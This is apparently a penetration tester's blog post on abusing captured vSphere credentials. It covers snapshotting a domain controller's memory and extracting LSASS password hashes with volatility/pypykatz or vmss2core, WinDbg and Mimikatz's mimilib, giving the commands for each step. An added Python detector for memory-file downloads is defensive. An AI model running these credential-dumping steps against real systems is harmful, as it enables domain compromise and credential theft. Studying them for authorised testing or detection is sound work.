Exploiting VSphere credentials in 2023
Published at Feb 16, 2023 - 07:55 AM
I've had a couple of engagements where I've ended up with VSphere credentials, logged in, and found that all the Windows servers, including the domain controller, are virtualised hosts within VSphere.
SharpSphere provides quite a few functions:
- Command & Control - In combination with F-Secure's C3, SharpSphere provides C&C into VMs using VMware Tools, with no direct network connectivity to the target VM required.
- Code Execution - Allows arbitrary commands to be executed in the guest OS and returns the result
- File Upload - Allows arbitrary files to be uploaded to the guest OS
- File Download - Allows arbitrary files to be downloaded from the guest OS
- List VMs - Lists the VMs managed by vCenter that have VMware Tools running
And finally, the one piece of functionality we actually want to do manually:
- Dump Memory - Dump and download a VM's memory
If we can dump the memory of a running Windows machine, logically the memory of the LSASS process is contained somewhere within that memory.
Using VSphere to snapshot Memory
Snapshot and download the .vmem and .vmsn files.
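A defender-side check for the snapshot-and-download step above, as an added example that is not part of the original post: it flags datastore downloads of memory files and raises the severity when the same VM had a memory-including snapshot shortly before. The event schema (ts, user, action, vm, memory, path), the 30-minute window, the user names and the sample events are assumptions constructed for illustration, not vCenter's native log format.

```python
import json
from datetime import datetime, timedelta

MEMORY_EXTS = (".vmem", ".vmsn", ".vmss")  # guest RAM and snapshot/suspend state files
WINDOW = timedelta(minutes=30)             # assumed correlation window

# Constructed sample events in a hypothetical normalized schema, one JSON object per line.
SAMPLE_EVENTS = """\
{"ts": "2023-02-16T07:01:00", "user": "svc-backup@vsphere.local", "action": "snapshot_create", "vm": "corp-fs01", "memory": false}
{"ts": "2023-02-16T07:05:00", "user": "jdoe@vsphere.local", "action": "snapshot_create", "vm": "corp-dc01", "memory": true}
{"ts": "2023-02-16T07:09:00", "user": "jdoe@vsphere.local", "action": "file_download", "path": "[datastore1] corp-dc01/corp-dc01-Snapshot1.vmem"}
{"ts": "2023-02-16T07:10:00", "user": "jdoe@vsphere.local", "action": "file_download", "path": "[datastore1] corp-dc01/corp-dc01-Snapshot1.vmsn"}
{"ts": "2023-02-16T07:30:00", "user": "svc-backup@vsphere.local", "action": "file_download", "path": "[datastore1] corp-fs01/corp-fs01.vmx"}
{"ts": "2023-02-16T09:00:00", "user": "admin2@vsphere.local", "action": "file_download", "path": "[datastore1] corp-web01/corp-web01-Snapshot3.vmem"}
"""

def vm_folder(path):
    """'[datastore1] corp-dc01/x.vmem' -> 'corp-dc01' (folder assumed to match the VM name)."""
    return path.split("] ", 1)[-1].split("/", 1)[0]

def detect(lines, window=WINDOW):
    """Return one alert per memory-file download, in time order.

    severity is 'high' when the VM had a memory snapshot within `window`
    before the download, otherwise 'medium'.
    """
    events = sorted((json.loads(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    mem_snaps = {}  # vm name -> time of its latest memory-including snapshot
    alerts = []
    for e in events:
        ts = datetime.fromisoformat(e["ts"])
        if e["action"] == "snapshot_create" and e.get("memory"):
            mem_snaps[e["vm"]] = ts
        elif e["action"] == "file_download" and e["path"].lower().endswith(MEMORY_EXTS):
            vm = vm_folder(e["path"])
            snap = mem_snaps.get(vm)
            recent = snap is not None and ts - snap <= window
            alerts.append({"ts": e["ts"], "user": e["user"], "vm": vm,
                           "path": e["path"], "severity": "high" if recent else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

Memory-file downloads with no matching snapshot still alert at medium severity, since an older snapshot or a suspended VM leaves the same files on the datastore.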
Dumping LSASS from the memory dump
There are some good blog posts on this part already [1][2][3] but I find they miss just enough that you can get stumped with some weird error. Normally I would love to sit on my Linux system to do this, but volatility and the pypykatz-volatility3 plugin break often. If you do still want to go down that road though… I have updated the plugin for it:
See https://github.com/f3rn0s/pypykatz-volatility3 for the updated version. In this repo I've included two slightly different versions of the plugin that are designed to dump LSASS. You can use these plugins like so:
$ vol -p "$(pwd)/pypykatz-volatility3" -f corp-dc01.vmem vol_pypykatz
$ vol -p "$(pwd)/pypykatz-volatility3" -f corp-dc01.vmem vol_shortkatz
The main difference between the two versions is that vol_shortkatz just prints out NT and LM hashes (which is normally all I need during a test) whereas vol_pypykatz prints all the details.
Just be aware that sometimes volatility can fail, but WinDbg is a pretty sure-fire method.
Setting up Windows
You can get the vmss2core utility from here: https://flings.vmware.com/vmss2core
We can use it to create a core dump from the memory file:
./vmss2core.exe -W8 ./corp-dc01.vmsn ./corp-dc01.vmem
You also need the x64 version of WinDbg, available from here (link courtesy of [1]): Link
We also want to grab a copy of Mimikatz, which includes a small DLL, called mimilib, designed to be loaded into WinDbg.
If the symbols don't exist on your system then you need to run the following commands after loading up the file:
.symfix
.reload /o /f nt
These commands will set WinDbg to download the offsets/symbols directly from Microsoft as needed.
We can then follow the Mimikatz guide:
.load C:\Tools\Mimikatz\x64\mimilib.dll
!process 0 0 lsass.exe
$$ EPROCESS_ADDR is the address shown after PROCESS in the previous command's output
.process /r /p EPROCESS_ADDR
!mimikatz